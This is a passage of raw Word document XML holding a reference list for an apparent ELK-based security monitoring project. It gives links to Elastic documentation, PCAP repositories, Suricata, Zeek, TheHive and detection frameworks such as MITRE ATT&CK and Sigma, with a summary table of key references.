            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27A030DA" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:hyperlink r:id="rId123" w:anchor="add-sample-data" w:tgtFrame="_new" w:history="1">
              <w:r w:rsidRPr="004816BF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.elastic.co/guide/en/kibana/current/getting-started.html#add-sample-data</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="05DBB0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6A105" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4C29C2" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PacketTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> PCAP Repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33EAFBBA" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve">Public malware &amp; network </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>pcaps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7D8F9" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>https://packettotal.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="24086A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D56D6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12C943E2" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> PCAP Uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E3DFD68" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>Analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve"> and download </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve"> files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B2F637C" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>https://www.virustotal.com/gui/home/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F17EDB" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="697051BB">
          <v:rect id="_x0000_i1391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C9C1B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Visualization &amp; Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1D9E17" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Kibana Visualization Guide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24" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A468983" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Vega Visualization Plugin (for Kibana heatmaps)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25" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/vega-graph.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F16200F" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="14FC63B4">
          <v:rect id="_x0000_i1392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED8C581" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Security &amp; Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DA879" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elastic Security Best Practices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26" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elastic-stack-get-started/current/security-get-started.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75D51627" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:lastRenderedPageBreak/>
        <w:t>Elasticsearch Snapshot &amp; Restore (Backups)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27" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-take-snapshot.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ABFBB1A" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elasticsearch Cluster Setup (Scaling)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28" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-node.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78797B54" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="3189B207">
          <v:rect id="_x0000_i1393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D5022" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 9️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Report &amp; Documentation Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7803B0" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>GitHub README Template (Best README Template Repo)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29" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/othneildrew/Best-README-Template</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="103260E4" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>IEEE Report Template (Conference Paper Format)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30" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ieee.org/conferences/publishing/templates.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77BBB828" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="0A7F94E2">
          <v:rect id="_x0000_i1394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794D29C" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔟</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bonus Learning Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360A315" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elastic Security Hands-On Lab (Free sandbox)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https://securitylabs.elastic.co/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D3292" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve">Suricata Documentation &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Eve.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> Format Reference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</w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.suricata.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B69F1FE" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Zeek (Network Security Monitor) Docs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https://docs.zeek.org/en/current/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7566C6" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>TheHive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> + Cortex (SOAR integration for auto-response) →</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> https://thehive-project.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F4C167" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="5B7F4983">
          <v:rect id="_x0000_i1395" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAC4F7B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary of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4780"/>
      </w:tblGrid>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="2B358D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1EAF7" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004816B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24FD1EE" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key References</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="3B647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89868" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Core ELK Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7BA48C" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Elastic Docs, Docker, Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="4C9D0C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59646" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Log Processing &amp; Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2962C144" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Logstash Filters, Beats Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="07328F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C803E" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection Rules &amp; Frameworks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F00A7CE" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t xml:space="preserve">MITRE ATT&amp;CK, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>SigmaHQ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>, Elastic Detection Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="25029C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849DD" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Intel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DF682BE" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>AbuseIPDB</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004816BF">
              <w:t>, AlienVault OTX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="264DD8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E70DF" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>APT Simulation &amp; Emulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="267D0C4E" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Atomic Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="65C33D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335D2" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Datasets &amp; Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E46353" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>CIC IDS, LANL, CTU-13, UNSW-NB15, Cowrie, Sysmon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="2EE9F6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E888B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF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5E9901E1" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Kibana &amp; Vega</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="678679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A83F" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351E53ED" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>Elastic Security Guides, Snapshots, TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="3FAC24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3712A" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/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2C792C7B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:t>GitHub README, IEEE Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004816BF" w:rsidRPr="004816BF" w14:paraId="68EF2B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F51B4" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
            <w:r w:rsidRPr="004816BF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Advanced Integrations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
